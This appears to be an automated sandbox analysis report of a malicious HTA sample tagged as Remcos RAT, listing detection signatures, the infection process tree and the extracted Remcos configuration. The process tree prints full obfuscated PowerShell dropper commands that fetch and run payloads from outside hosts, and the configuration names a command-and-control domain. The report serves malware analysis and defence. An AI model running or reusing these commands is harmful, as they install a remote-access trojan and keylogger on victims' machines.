Windows Analysis Report: LJ1IZDkHyE.hta
Overview
General Information
Sample name: | LJ1IZDkHyE.hta (renamed because the original name is a hash value) |
Original sample name: | d6a04e7ba31d063b7176e3f9fc96c46a.hta |
Analysis ID: | 1518499 |
MD5: | d6a04e7ba31d063b7176e3f9fc96c46a |
SHA1: | e8929b14ea18c20d4a81ac3faf681031924c9d14 |
SHA256: | 2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2 |
Tags: | hta, RAT, RemcosRAT, user-abuse_ch |
Detection
Cobalt Strike, Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 5508 cmdline: mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 940 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX( $(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1600 cmdline: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 1672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 2472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- RegAsm.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |